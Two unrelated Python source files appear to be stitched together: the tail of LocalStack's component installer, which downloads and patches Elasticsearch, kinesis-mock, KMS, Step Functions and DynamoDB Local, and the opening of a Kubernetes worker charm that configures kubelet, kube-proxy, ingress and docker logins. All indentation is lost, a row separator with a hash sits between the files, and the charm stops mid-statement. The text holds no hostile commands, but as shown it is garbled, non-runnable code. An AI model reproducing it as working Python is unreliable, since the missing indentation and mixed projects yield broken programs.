MARKER_FILE_LIGHT_VERSION = "%s/.light-version" % INSTALL_DIR_INFRA
IMAGE_NAME_SFN_LOCAL = "amazon/aws-stepfunctions-local"
ARTIFACTS_REPO = "https://github.com/localstack/localstack-artifacts"
SFN_PATCH_CLASS = (
"com/amazonaws/stepfunctions/local/runtime/executors/task/LambdaTaskStateExecutor.class"
)
SFN_PATCH_CLASS_URL = "%s/raw/master/stepfunctions-local-patch/%s" % (
ARTIFACTS_REPO,
SFN_PATCH_CLASS,
)
# kinesis-mock version
KINESIS_MOCK_VERSION = os.environ.get("KINESIS_MOCK_VERSION") or "0.1.3"
KINESIS_MOCK_RELEASE_URL = (
"https://api.github.com/repos/etspaceman/kinesis-mock/releases/tags/" + KINESIS_MOCK_VERSION
)
DEBUGPY_MODULE = "debugpy"
DEBUGPY_DEPENDENCIES = ["gcc", "python3-dev", "musl-dev"]
# Target version for javac, to ensure compatibility with earlier JREs
JAVAC_TARGET_VERSION = "1.8"
# SQS backend implementation provider - either "moto" or "elasticmq"
SQS_BACKEND_IMPL = os.environ.get("SQS_PROVIDER") or "moto"
# TODO: 2019-10-09: Temporarily overwriting DDB, as we're hitting a SIGSEGV JVM crash with the latest version
OVERWRITE_DDB_FILES_IN_DOCKER = False
# set up logger
LOG = logging.getLogger(__name__)
def get_elasticsearch_install_version(version=None):
if config.SKIP_INFRA_DOWNLOADS:
return ELASTICSEARCH_DEFAULT_VERSION
return version or ELASTICSEARCH_DEFAULT_VERSION
def get_elasticsearch_install_dir(version=None):
version = get_elasticsearch_install_version(version)
if version == ELASTICSEARCH_DEFAULT_VERSION and not os.path.exists(MARKER_FILE_LIGHT_VERSION):
# install the default version into a subfolder of the code base
install_dir = os.path.join(INSTALL_DIR_INFRA, "elasticsearch")
else:
install_dir = os.path.join(config.TMP_FOLDER, "elasticsearch", version)
return install_dir
def install_elasticsearch(version=None):
version = get_elasticsearch_install_version(version)
install_dir = get_elasticsearch_install_dir(version)
installed_executable = os.path.join(install_dir, "bin", "elasticsearch")
if not os.path.exists(installed_executable):
log_install_msg("Elasticsearch (%s)" % version)
es_url = ELASTICSEARCH_URLS.get(version)
if not es_url:
raise Exception('Unable to find download URL for Elasticsearch version "%s"' % version)
install_dir_parent = os.path.dirname(install_dir)
mkdir(install_dir_parent)
# download and extract archive
tmp_archive = os.path.join(config.TMP_FOLDER, "localstack.%s" % os.path.basename(es_url))
download_and_extract_with_retry(es_url, tmp_archive, install_dir_parent)
elasticsearch_dir = glob.glob(os.path.join(install_dir_parent, "elasticsearch*"))
if not elasticsearch_dir:
raise Exception("Unable to find Elasticsearch folder in %s" % install_dir_parent)
shutil.move(elasticsearch_dir[0], install_dir)
for dir_name in ("data", "logs", "modules", "plugins", "config/scripts"):
dir_path = os.path.join(install_dir, dir_name)
mkdir(dir_path)
chmod_r(dir_path, 0o777)
# install default plugins
for plugin in ELASTICSEARCH_PLUGIN_LIST:
if is_alpine():
# https://github.com/pires/docker-elasticsearch/issues/56
os.environ["ES_TMPDIR"] = "/tmp"
plugin_binary = os.path.join(install_dir, "bin", "elasticsearch-plugin")
plugin_dir = os.path.join(install_dir, "plugins", plugin)
if not os.path.exists(plugin_dir):
LOG.info("Installing Elasticsearch plugin %s" % (plugin))
run("%s install -b %s" % (plugin_binary, plugin))
# delete some plugins to free up space
for plugin in ELASTICSEARCH_DELETE_MODULES:
module_dir = os.path.join(install_dir, "modules", plugin)
rm_rf(module_dir)
# disable x-pack-ml plugin (not working on Alpine)
xpack_dir = os.path.join(install_dir, "modules", "x-pack-ml", "platform")
rm_rf(xpack_dir)
# patch JVM options file - replace hardcoded heap size settings
jvm_options_file = os.path.join(install_dir, "config", "jvm.options")
if os.path.exists(jvm_options_file):
jvm_options = load_file(jvm_options_file)
jvm_options_replaced = re.sub(
r"(^-Xm[sx][a-zA-Z0-9\.]+$)", r"# \1", jvm_options, flags=re.MULTILINE
)
if jvm_options != jvm_options_replaced:
save_file(jvm_options_file, jvm_options_replaced)
def install_elasticmq():
if SQS_BACKEND_IMPL != "elasticmq":
return
# TODO remove this function if we stop using ElasticMQ entirely
if not os.path.exists(INSTALL_PATH_ELASTICMQ_JAR):
log_install_msg("ElasticMQ")
mkdir(INSTALL_DIR_ELASTICMQ)
# download archive
tmp_archive = os.path.join(config.TMP_FOLDER, "elasticmq-server.jar")
if not os.path.exists(tmp_archive):
download(ELASTICMQ_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_ELASTICMQ)
def install_kinesis():
if KINESIS_PROVIDER == "kinesalite":
return install_kinesalite()
elif KINESIS_PROVIDER == "kinesis-mock":
return install_kinesis_mock()
else:
raise ValueError("unknown kinesis provider %s" % KINESIS_PROVIDER)
def install_kinesalite():
if not os.path.exists(INSTALL_PATH_KINESALITE_CLI):
log_install_msg("Kinesis")
run('cd "%s" && npm install' % MODULE_MAIN_PATH)
def install_kinesis_mock():
target_dir = INSTALL_PATH_KINESIS_MOCK
machine = platform.machine().lower()
system = platform.system().lower()
version = platform.version().lower()
is_probably_m1 = system == "darwin" and ("arm64" in version or "arm32" in version)
LOG.debug("getting kinesis-mock for %s %s", system, machine)
if (machine == "x86_64" or machine == "amd64") and not is_probably_m1:
if system == "windows":
bin_file = "kinesis-mock-mostly-static.exe"
elif system == "linux":
bin_file = "kinesis-mock-linux-amd64-static"
elif system == "darwin":
bin_file = "kinesis-mock-macos-amd64-dynamic"
else:
bin_file = "kinesis-mock.jar"
else:
bin_file = "kinesis-mock.jar"
bin_file_path = os.path.join(target_dir, bin_file)
if os.path.exists(bin_file_path):
LOG.debug("kinesis-mock found at %s", bin_file_path)
return bin_file_path
response = requests.get(KINESIS_MOCK_RELEASE_URL)
if not response.ok:
raise ValueError(
"Could not get list of releases from %s: %s" % (KINESIS_MOCK_RELEASE_URL, response.text)
)
github_release = response.json()
download_url = None
for asset in github_release.get("assets", []):
# find the correct binary in the release
if asset["name"] == bin_file:
download_url = asset["browser_download_url"]
break
if download_url is None:
raise ValueError(
"could not find required binary %s in release %s" % (bin_file, KINESIS_MOCK_RELEASE_URL)
)
mkdir(target_dir)
LOG.info("downloading kinesis-mock binary from %s", download_url)
download(download_url, bin_file_path)
chmod_r(bin_file_path, 0o777)
return bin_file_path
def install_local_kms():
local_arch = get_arch()
binary_path = INSTALL_PATH_KMS_BINARY_PATTERN.replace("<arch>", local_arch)
if not os.path.exists(binary_path):
log_install_msg("KMS")
mkdir(INSTALL_DIR_KMS)
kms_url = KMS_URL_PATTERN.replace("<arch>", local_arch)
download(kms_url, binary_path)
chmod_r(binary_path, 0o777)
def install_stepfunctions_local():
if not os.path.exists(INSTALL_PATH_STEPFUNCTIONS_JAR):
# pull the JAR file from the Docker image, which is more up-to-date than the downloadable JAR file
log_install_msg("Step Functions")
mkdir(INSTALL_DIR_STEPFUNCTIONS)
run("{dc} pull {img}".format(dc=config.DOCKER_CMD, img=IMAGE_NAME_SFN_LOCAL))
docker_name = "tmp-ls-sfn"
run(
("{dc} run --name={dn} --entrypoint= -d --rm {img} sleep 15").format(
dc=config.DOCKER_CMD, dn=docker_name, img=IMAGE_NAME_SFN_LOCAL
)
)
time.sleep(5)
run(
"{dc} cp {dn}:/home/stepfunctionslocal/ {tgt}".format(
dc=config.DOCKER_CMD, dn=docker_name, tgt=INSTALL_DIR_INFRA
)
)
run("mv %s/stepfunctionslocal/*.jar %s" % (INSTALL_DIR_INFRA, INSTALL_DIR_STEPFUNCTIONS))
rm_rf("%s/stepfunctionslocal" % INSTALL_DIR_INFRA)
# apply patches
patch_class_file = os.path.join(INSTALL_DIR_STEPFUNCTIONS, SFN_PATCH_CLASS)
if not os.path.exists(patch_class_file):
download(SFN_PATCH_CLASS_URL, patch_class_file)
cmd = 'cd "%s"; zip %s %s' % (
INSTALL_DIR_STEPFUNCTIONS,
INSTALL_PATH_STEPFUNCTIONS_JAR,
SFN_PATCH_CLASS,
)
run(cmd)
def install_dynamodb_local():
if OVERWRITE_DDB_FILES_IN_DOCKER and in_docker():
rm_rf(INSTALL_DIR_DDB)
is_in_alpine = is_alpine()
if not os.path.exists(INSTALL_PATH_DDB_JAR):
log_install_msg("DynamoDB")
# download and extract archive
tmp_archive = os.path.join(tempfile.gettempdir(), "localstack.ddb.zip")
dynamodb_url = DYNAMODB_JAR_URL_ALPINE if is_in_alpine else DYNAMODB_JAR_URL
download_and_extract_with_retry(dynamodb_url, tmp_archive, INSTALL_DIR_DDB)
# fix logging configuration for DynamoDBLocal
log4j2_config = """<Configuration status="WARN">
<Appenders>
<Console name="Console" target="SYSTEM_OUT">
<PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
</Console>
</Appenders>
<Loggers>
<Root level="WARN"><AppenderRef ref="Console"/></Root>
</Loggers>
</Configuration>"""
log4j2_file = os.path.join(INSTALL_DIR_DDB, "log4j2.xml")
save_file(log4j2_file, log4j2_config)
run('cd "%s" && zip -u DynamoDBLocal.jar log4j2.xml || true' % INSTALL_DIR_DDB)
def install_amazon_kinesis_client_libs():
# install KCL/STS JAR files
if not os.path.exists(INSTALL_PATH_KCL_JAR):
mkdir(INSTALL_DIR_KCL)
tmp_archive = os.path.join(tempfile.gettempdir(), "aws-java-sdk-sts.jar")
if not os.path.exists(tmp_archive):
download(STS_JAR_URL, tmp_archive)
shutil.copy(tmp_archive, INSTALL_DIR_KCL)
# Compile Java files
from localstack.utils.kinesis import kclipy_helper
classpath = kclipy_helper.get_kcl_classpath()
if is_windows():
classpath = re.sub(r":([^\\])", r";\1", classpath)
java_files = "%s/utils/kinesis/java/cloud/localstack/*.java" % MODULE_MAIN_PATH
class_files = "%s/utils/kinesis/java/cloud/localstack/*.class" % MODULE_MAIN_PATH
if not glob.glob(class_files):
run(
'javac -source %s -target %s -cp "%s" %s'
% (JAVAC_TARGET_VERSION, JAVAC_TARGET_VERSION, classpath, java_files)
)
def install_lambda_java_libs():
# install LocalStack "fat" JAR file (contains all dependencies)
if not os.path.exists(INSTALL_PATH_LOCALSTACK_FAT_JAR):
log_install_msg("LocalStack Java libraries", verbatim=True)
download(URL_LOCALSTACK_FAT_JAR, INSTALL_PATH_LOCALSTACK_FAT_JAR)
def install_cloudformation_libs():
from localstack.services.cloudformation import deployment_utils
# trigger download of CF module file
deployment_utils.get_cfn_response_mod_file()
def install_component(name):
installers = {
"cloudformation": install_cloudformation_libs,
"dynamodb": install_dynamodb_local,
"kinesis": install_kinesis,
"kms": install_local_kms,
"sqs": install_elasticmq,
"stepfunctions": install_stepfunctions_local,
}
installer = installers.get(name)
if installer:
installer()
def install_components(names):
parallelize(install_component, names)
install_lambda_java_libs()
def install_all_components():
# load plugins
os.environ[LOCALSTACK_INFRA_PROCESS] = "1"
bootstrap.load_plugins()
# install all components
install_components(DEFAULT_SERVICE_PORTS.keys())
def install_debugpy_and_dependencies():
try:
import debugpy
assert debugpy
logging.debug("Debugpy module already Installed")
except ModuleNotFoundError:
logging.debug("Installing Debugpy module")
import pip
if hasattr(pip, "main"):
pip.main(["install", DEBUGPY_MODULE])
else:
pip._internal.main(["install", DEBUGPY_MODULE])
# -----------------
# HELPER FUNCTIONS
# -----------------
def log_install_msg(component, verbatim=False):
component = component if verbatim else "local %s server" % component
LOG.info("Downloading and installing %s. This may take some time." % component)
def download_and_extract(archive_url, target_dir, retries=0, sleep=3, tmp_archive=None):
mkdir(target_dir)
tmp_archive = tmp_archive or new_tmp_file()
if not os.path.exists(tmp_archive):
# create temporary placeholder file, to avoid duplicate parallel downloads
save_file(tmp_archive, "")
for i in range(retries + 1):
try:
download(archive_url, tmp_archive)
break
except Exception:
time.sleep(sleep)
_, ext = os.path.splitext(tmp_archive)
if ext == ".zip":
unzip(tmp_archive, target_dir)
elif ext == ".gz" or ext == ".bz2":
untar(tmp_archive, target_dir)
else:
raise Exception("Unsupported archive format: %s" % ext)
def download_and_extract_with_retry(archive_url, tmp_archive, target_dir):
try:
download_and_extract(archive_url, target_dir, tmp_archive=tmp_archive)
except Exception as e:
# try deleting and re-downloading the zip file
LOG.info("Unable to extract file, re-downloading ZIP archive %s: %s" % (tmp_archive, e))
rm_rf(tmp_archive)
download_and_extract(archive_url, target_dir, tmp_archive=tmp_archive)
def main():
if len(sys.argv) > 1:
os.environ["LOCALSTACK_API_KEY"] = os.environ.get("LOCALSTACK_API_KEY") or "test"
if sys.argv[1] == "libs":
print("Initializing installation.")
logging.basicConfig(level=logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
install_all_components()
if sys.argv[1] in ("libs", "testlibs"):
# Install additional libraries for testing
install_amazon_kinesis_client_libs()
print("Done.")
if __name__ == "__main__":
main()
|
py | 1a4fa1641dd5c5ecae55dd0c11a1951e288907a7 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import random
import shutil
import subprocess
import time
from shlex import split
from subprocess import check_call, check_output
from subprocess import CalledProcessError
from socket import gethostname
from charms import layer
from charms.layer import snap
from charms.reactive import hook
from charms.reactive import set_state, remove_state, is_state
from charms.reactive import when, when_any, when_not
from charms.kubernetes.common import get_version
from charms.reactive.helpers import data_changed, any_file_changed
from charms.templating.jinja2 import render
from charmhelpers.core import hookenv, unitdata
from charmhelpers.core.host import service_stop, service_restart
from charmhelpers.contrib.charmsupport import nrpe
# Override the default nagios shortname regex to allow periods, which we
# need because our bin names contain them (e.g. 'snap.foo.daemon'). The
# default regex in charmhelpers doesn't allow periods, but nagios itself does.
nrpe.Check.shortname_re = r'[\.A-Za-z0-9-_]+$'
kubeconfig_path = '/root/cdk/kubeconfig'
kubeproxyconfig_path = '/root/cdk/kubeproxyconfig'
kubeclientconfig_path = '/root/.kube/config'
os.environ['PATH'] += os.pathsep + os.path.join(os.sep, 'snap', 'bin')
db = unitdata.kv()
@hook('upgrade-charm')
def upgrade_charm():
# Trigger removal of PPA docker installation if it was previously set.
set_state('config.changed.install_from_upstream')
hookenv.atexit(remove_state, 'config.changed.install_from_upstream')
cleanup_pre_snap_services()
check_resources_for_upgrade_needed()
# Remove the RC for nginx ingress if it exists
if hookenv.config().get('ingress'):
kubectl_success('delete', 'rc', 'nginx-ingress-controller')
# Remove gpu.enabled state so we can reconfigure gpu-related kubelet flags,
# since they can differ between k8s versions
remove_state('kubernetes-worker.gpu.enabled')
remove_state('kubernetes-worker.cni-plugins.installed')
remove_state('kubernetes-worker.config.created')
remove_state('kubernetes-worker.ingress.available')
set_state('kubernetes-worker.restart-needed')
def check_resources_for_upgrade_needed():
hookenv.status_set('maintenance', 'Checking resources')
resources = ['kubectl', 'kubelet', 'kube-proxy']
paths = [hookenv.resource_get(resource) for resource in resources]
if any_file_changed(paths):
set_upgrade_needed()
def set_upgrade_needed():
set_state('kubernetes-worker.snaps.upgrade-needed')
config = hookenv.config()
previous_channel = config.previous('channel')
require_manual = config.get('require-manual-upgrade')
if previous_channel is None or not require_manual:
set_state('kubernetes-worker.snaps.upgrade-specified')
def cleanup_pre_snap_services():
# remove old states
remove_state('kubernetes-worker.components.installed')
# disable old services
services = ['kubelet', 'kube-proxy']
for service in services:
hookenv.log('Stopping {0} service.'.format(service))
service_stop(service)
# cleanup old files
files = [
"/lib/systemd/system/kubelet.service",
"/lib/systemd/system/kube-proxy.service",
"/etc/default/kube-default",
"/etc/default/kubelet",
"/etc/default/kube-proxy",
"/srv/kubernetes",
"/usr/local/bin/kubectl",
"/usr/local/bin/kubelet",
"/usr/local/bin/kube-proxy",
"/etc/kubernetes"
]
for file in files:
if os.path.isdir(file):
hookenv.log("Removing directory: " + file)
shutil.rmtree(file)
elif os.path.isfile(file):
hookenv.log("Removing file: " + file)
os.remove(file)
@when('config.changed.channel')
def channel_changed():
set_upgrade_needed()
@when('kubernetes-worker.snaps.upgrade-needed')
@when_not('kubernetes-worker.snaps.upgrade-specified')
def upgrade_needed_status():
msg = 'Needs manual upgrade, run the upgrade action'
hookenv.status_set('blocked', msg)
@when('kubernetes-worker.snaps.upgrade-specified')
def install_snaps():
check_resources_for_upgrade_needed()
channel = hookenv.config('channel')
hookenv.status_set('maintenance', 'Installing kubectl snap')
snap.install('kubectl', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kubelet snap')
snap.install('kubelet', channel=channel, classic=True)
hookenv.status_set('maintenance', 'Installing kube-proxy snap')
snap.install('kube-proxy', channel=channel, classic=True)
set_state('kubernetes-worker.snaps.installed')
set_state('kubernetes-worker.restart-needed')
remove_state('kubernetes-worker.snaps.upgrade-needed')
remove_state('kubernetes-worker.snaps.upgrade-specified')
@hook('stop')
def shutdown():
''' When this unit is destroyed:
- delete the current node
- stop the worker services
'''
try:
if os.path.isfile(kubeconfig_path):
kubectl('delete', 'node', gethostname().lower())
except CalledProcessError:
hookenv.log('Failed to unregister node.')
service_stop('snap.kubelet.daemon')
service_stop('snap.kube-proxy.daemon')
@when('docker.available')
@when_not('kubernetes-worker.cni-plugins.installed')
def install_cni_plugins():
''' Unpack the cni-plugins resource '''
charm_dir = os.getenv('CHARM_DIR')
# Get the resource via resource_get
try:
resource_name = 'cni-{}'.format(arch())
archive = hookenv.resource_get(resource_name)
except Exception:
message = 'Error fetching the cni resource.'
hookenv.log(message)
hookenv.status_set('blocked', message)
return
if not archive:
hookenv.log('Missing cni resource.')
hookenv.status_set('blocked', 'Missing cni resource.')
return
    # Handle null resource publication; we check if filesize < 1mb
filesize = os.stat(archive).st_size
if filesize < 1000000:
hookenv.status_set('blocked', 'Incomplete cni resource.')
return
hookenv.status_set('maintenance', 'Unpacking cni resource.')
unpack_path = '{}/files/cni'.format(charm_dir)
os.makedirs(unpack_path, exist_ok=True)
cmd = ['tar', 'xfvz', archive, '-C', unpack_path]
hookenv.log(cmd)
check_call(cmd)
apps = [
{'name': 'loopback', 'path': '/opt/cni/bin'}
]
for app in apps:
unpacked = '{}/{}'.format(unpack_path, app['name'])
app_path = os.path.join(app['path'], app['name'])
install = ['install', '-v', '-D', unpacked, app_path]
hookenv.log(install)
check_call(install)
# Used by the "registry" action. The action is run on a single worker, but
# the registry pod can end up on any worker, so we need this directory on
# all the workers.
os.makedirs('/srv/registry', exist_ok=True)
set_state('kubernetes-worker.cni-plugins.installed')
@when('kubernetes-worker.snaps.installed')
def set_app_version():
''' Declare the application version to juju '''
cmd = ['kubelet', '--version']
version = check_output(cmd)
hookenv.application_version_set(version.split(b' v')[-1].rstrip())
@when('kubernetes-worker.snaps.installed')
@when_not('kube-control.dns.available')
def notify_user_transient_status():
    ''' Notify the user that we are in a transient state and the application
    is still converging. We may be waiting on a remote unit, or sitting in a
    detached wait loop. '''
    # During deployment the worker has to start kubelet without cluster dns
    # configured. If this is the first unit online in a service pool, it waits
    # to self-host the dns pod and then configures itself to query the dns
    # service declared in the kube-system namespace.
hookenv.status_set('waiting', 'Waiting for cluster DNS.')
@when('kubernetes-worker.snaps.installed',
'kube-control.dns.available')
@when_not('kubernetes-worker.snaps.upgrade-needed')
def charm_status(kube_control):
'''Update the status message with the current status of kubelet.'''
update_kubelet_status()
def update_kubelet_status():
''' There are different states that the kubelet can be in, where we are
waiting for dns, waiting for cluster turnup, or ready to serve
applications.'''
services = [
'kubelet',
'kube-proxy'
]
failing_services = []
for service in services:
daemon = 'snap.{}.daemon'.format(service)
if not _systemctl_is_active(daemon):
failing_services.append(service)
if len(failing_services) == 0:
hookenv.status_set('active', 'Kubernetes worker running.')
else:
msg = 'Waiting for {} to start.'.format(','.join(failing_services))
hookenv.status_set('waiting', msg)
def get_ingress_address(relation):
try:
network_info = hookenv.network_get(relation.relation_name)
except NotImplementedError:
network_info = []
if network_info and 'ingress-addresses' in network_info:
        # just grab the first one for now; maybe we should be more robust here?
return network_info['ingress-addresses'][0]
else:
# if they don't have ingress-addresses they are running a juju that
# doesn't support spaces, so just return the private address
return hookenv.unit_get('private-address')
@when('certificates.available', 'kube-control.connected')
def send_data(tls, kube_control):
'''Send the data that is required to create a server certificate for
this server.'''
# Use the public ip of this unit as the Common Name for the certificate.
common_name = hookenv.unit_public_ip()
ingress_ip = get_ingress_address(kube_control)
# Create SANs that the tls layer will add to the server cert.
sans = [
hookenv.unit_public_ip(),
ingress_ip,
gethostname()
]
# Create a path safe name by removing path characters from the unit name.
certificate_name = hookenv.local_unit().replace('/', '_')
# Request a server cert with this information.
tls.request_server_cert(common_name, sans, certificate_name)
@when('kube-api-endpoint.available', 'kube-control.dns.available',
'cni.available')
def watch_for_changes(kube_api, kube_control, cni):
''' Watch for configuration changes and signal if we need to restart the
worker services '''
servers = get_kube_api_servers(kube_api)
dns = kube_control.get_dns()
cluster_cidr = cni.get_config()['cidr']
if (data_changed('kube-api-servers', servers) or
data_changed('kube-dns', dns) or
data_changed('cluster-cidr', cluster_cidr)):
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.snaps.installed', 'kube-api-endpoint.available',
'tls_client.ca.saved', 'tls_client.client.certificate.saved',
'tls_client.client.key.saved', 'tls_client.server.certificate.saved',
'tls_client.server.key.saved',
'kube-control.dns.available', 'kube-control.auth.available',
'cni.available', 'kubernetes-worker.restart-needed',
'worker.auth.bootstrapped')
def start_worker(kube_api, kube_control, auth_control, cni):
''' Start kubelet using the provided API and DNS info.'''
servers = get_kube_api_servers(kube_api)
# Note that the DNS server doesn't necessarily exist at this point. We know
# what its IP will eventually be, though, so we can go ahead and configure
# kubelet with that info. This ensures that early pods are configured with
# the correct DNS even though the server isn't ready yet.
dns = kube_control.get_dns()
ingress_ip = get_ingress_address(kube_control)
cluster_cidr = cni.get_config()['cidr']
if cluster_cidr is None:
hookenv.log('Waiting for cluster cidr.')
return
creds = db.get('credentials')
data_changed('kube-control.creds', creds)
# set --allow-privileged flag for kubelet
set_privileged()
create_config(random.choice(servers), creds)
configure_kubelet(dns, ingress_ip)
configure_kube_proxy(servers, cluster_cidr)
set_state('kubernetes-worker.config.created')
restart_unit_services()
update_kubelet_status()
apply_node_labels()
remove_state('kubernetes-worker.restart-needed')
@when('cni.connected')
@when_not('cni.configured')
def configure_cni(cni):
''' Set worker configuration on the CNI relation. This lets the CNI
subordinate know that we're the worker so it can respond accordingly. '''
cni.set_config(is_master=False, kubeconfig_path=kubeconfig_path)
@when('config.changed.ingress')
def toggle_ingress_state():
''' Ingress is a toggled state. Remove ingress.available if set when
toggled '''
remove_state('kubernetes-worker.ingress.available')
@when('docker.sdn.configured')
def sdn_changed():
'''The Software Defined Network changed on the container so restart the
kubernetes services.'''
restart_unit_services()
update_kubelet_status()
remove_state('docker.sdn.configured')
@when('kubernetes-worker.config.created')
@when_not('kubernetes-worker.ingress.available')
def render_and_launch_ingress():
''' If configuration has ingress daemon set enabled, launch the ingress load
balancer and default http backend. Otherwise attempt deletion. '''
config = hookenv.config()
# If ingress is enabled, launch the ingress controller
if config.get('ingress'):
launch_default_ingress_controller()
else:
hookenv.log('Deleting the http backend and ingress.')
kubectl_manifest('delete',
'/root/cdk/addons/default-http-backend.yaml')
kubectl_manifest('delete',
'/root/cdk/addons/ingress-daemon-set.yaml') # noqa
hookenv.close_port(80)
hookenv.close_port(443)
@when('config.changed.labels', 'kubernetes-worker.config.created')
def apply_node_labels():
''' Parse the labels configuration option and apply the labels to the node.
'''
# scrub and try to format an array from the configuration option
config = hookenv.config()
user_labels = _parse_labels(config.get('labels'))
# For diffing sake, iterate the previous label set
if config.previous('labels'):
previous_labels = _parse_labels(config.previous('labels'))
hookenv.log('previous labels: {}'.format(previous_labels))
else:
# this handles first time run if there is no previous labels config
previous_labels = _parse_labels("")
# Calculate label removal
for label in previous_labels:
if label not in user_labels:
hookenv.log('Deleting node label {}'.format(label))
_apply_node_label(label, delete=True)
# if the label is in user labels we do nothing here, it will get set
# during the atomic update below.
# Atomically set a label
for label in user_labels:
_apply_node_label(label, overwrite=True)
# Set label for application name
_apply_node_label('juju-application={}'.format(hookenv.service_name()),
overwrite=True)
@when_any('config.changed.kubelet-extra-args',
'config.changed.proxy-extra-args')
def extra_args_changed():
set_state('kubernetes-worker.restart-needed')
@when('config.changed.docker-logins')
def docker_logins_changed():
config = hookenv.config()
previous_logins = config.previous('docker-logins')
logins = config['docker-logins']
logins = json.loads(logins)
if previous_logins:
previous_logins = json.loads(previous_logins)
next_servers = {login['server'] for login in logins}
previous_servers = {login['server'] for login in previous_logins}
servers_to_logout = previous_servers - next_servers
for server in servers_to_logout:
cmd = ['docker', 'logout', server]
subprocess.check_call(cmd)
for login in logins:
server = login['server']
username = login['username']
password = login['password']
cmd = ['docker', 'login', server, '-u', username, '-p', password]
subprocess.check_call(cmd)
set_state('kubernetes-worker.restart-needed')
def arch():
'''Return the package architecture as a string. Raise an exception if the
architecture is not supported by kubernetes.'''
# Get the package architecture for this system.
architecture = check_output(['dpkg', '--print-architecture']).rstrip()
# Convert the binary result into a string.
architecture = architecture.decode('utf-8')
return architecture
def create_config(server, creds):
'''Create a kubernetes configuration for the worker unit.'''
# Get the options from the tls-client layer.
layer_options = layer.options('tls-client')
# Get all the paths to the tls information required for kubeconfig.
ca = layer_options.get('ca_certificate_path')
# Create kubernetes configuration in the default location for ubuntu.
create_kubeconfig('/home/ubuntu/.kube/config', server, ca,
token=creds['client_token'], user='ubuntu')
# Make the config dir readable by the ubuntu users so juju scp works.
cmd = ['chown', '-R', 'ubuntu:ubuntu', '/home/ubuntu/.kube']
check_call(cmd)
# Create kubernetes configuration in the default location for root.
create_kubeconfig(kubeclientconfig_path, server, ca,
token=creds['client_token'], user='root')
# Create kubernetes configuration for kubelet, and kube-proxy services.
create_kubeconfig(kubeconfig_path, server, ca,
token=creds['kubelet_token'], user='kubelet')
create_kubeconfig(kubeproxyconfig_path, server, ca,
token=creds['proxy_token'], user='kube-proxy')
def parse_extra_args(config_key):
elements = hookenv.config().get(config_key, '').split()
args = {}
for element in elements:
if '=' in element:
key, _, value = element.partition('=')
args[key] = value
else:
args[element] = 'true'
return args
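# Illustrative sketch (not part of the original charm): the splitting rule that
# parse_extra_args applies, shown on a hard-coded sample string instead of the
# charm config so it can run outside a Juju hook context.
def _example_parse_extra_args():
    sample = 'v=4 feature-gates=PodPriority=true enable-debugging-handlers'
    args = {}
    for element in sample.split():
        key, _, value = element.partition('=')
        args[key] = value if value else 'true'
    # -> {'v': '4', 'feature-gates': 'PodPriority=true',
    #     'enable-debugging-handlers': 'true'}
    return args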
def configure_kubernetes_service(service, base_args, extra_args_key):
db = unitdata.kv()
prev_args_key = 'kubernetes-worker.prev_args.' + service
prev_args = db.get(prev_args_key) or {}
extra_args = parse_extra_args(extra_args_key)
args = {}
for arg in prev_args:
# remove previous args by setting to null
args[arg] = 'null'
for k, v in base_args.items():
args[k] = v
for k, v in extra_args.items():
args[k] = v
cmd = ['snap', 'set', service] + ['%s=%s' % item for item in args.items()]
check_call(cmd)
db.set(prev_args_key, args)
def configure_kubelet(dns, ingress_ip):
layer_options = layer.options('tls-client')
ca_cert_path = layer_options.get('ca_certificate_path')
server_cert_path = layer_options.get('server_certificate_path')
server_key_path = layer_options.get('server_key_path')
kubelet_opts = {}
kubelet_opts['require-kubeconfig'] = 'true'
kubelet_opts['kubeconfig'] = kubeconfig_path
kubelet_opts['network-plugin'] = 'cni'
kubelet_opts['v'] = '0'
kubelet_opts['address'] = '0.0.0.0'
kubelet_opts['port'] = '10250'
kubelet_opts['cluster-domain'] = dns['domain']
kubelet_opts['anonymous-auth'] = 'false'
kubelet_opts['client-ca-file'] = ca_cert_path
kubelet_opts['tls-cert-file'] = server_cert_path
kubelet_opts['tls-private-key-file'] = server_key_path
kubelet_opts['logtostderr'] = 'true'
kubelet_opts['fail-swap-on'] = 'false'
kubelet_opts['node-ip'] = ingress_ip
if (dns['enable-kube-dns']):
kubelet_opts['cluster-dns'] = dns['sdn-ip']
privileged = is_state('kubernetes-worker.privileged')
kubelet_opts['allow-privileged'] = 'true' if privileged else 'false'
if is_state('kubernetes-worker.gpu.enabled'):
if get_version('kubelet') < (1, 6):
hookenv.log('Adding --experimental-nvidia-gpus=1 to kubelet')
kubelet_opts['experimental-nvidia-gpus'] = '1'
else:
hookenv.log('Adding --feature-gates=Accelerators=true to kubelet')
kubelet_opts['feature-gates'] = 'Accelerators=true'
configure_kubernetes_service('kubelet', kubelet_opts, 'kubelet-extra-args')
def configure_kube_proxy(api_servers, cluster_cidr):
kube_proxy_opts = {}
kube_proxy_opts['cluster-cidr'] = cluster_cidr
kube_proxy_opts['kubeconfig'] = kubeproxyconfig_path
kube_proxy_opts['logtostderr'] = 'true'
kube_proxy_opts['v'] = '0'
kube_proxy_opts['master'] = random.choice(api_servers)
if b'lxc' in check_output('virt-what', shell=True):
kube_proxy_opts['conntrack-max-per-core'] = '0'
configure_kubernetes_service('kube-proxy', kube_proxy_opts,
'proxy-extra-args')
def create_kubeconfig(kubeconfig, server, ca, key=None, certificate=None,
user='ubuntu', context='juju-context',
cluster='juju-cluster', password=None, token=None):
'''Create a configuration for Kubernetes based on path using the supplied
arguments for values of the Kubernetes server, CA, key, certificate, user
context and cluster.'''
if not key and not certificate and not password and not token:
raise ValueError('Missing authentication mechanism.')
# token and password are mutually exclusive. Error early if both are
# present. The developer has requested an impossible situation.
# see: kubectl config set-credentials --help
if token and password:
raise ValueError('Token and Password are mutually exclusive.')
# Create the config file with the address of the master server.
cmd = 'kubectl config --kubeconfig={0} set-cluster {1} ' \
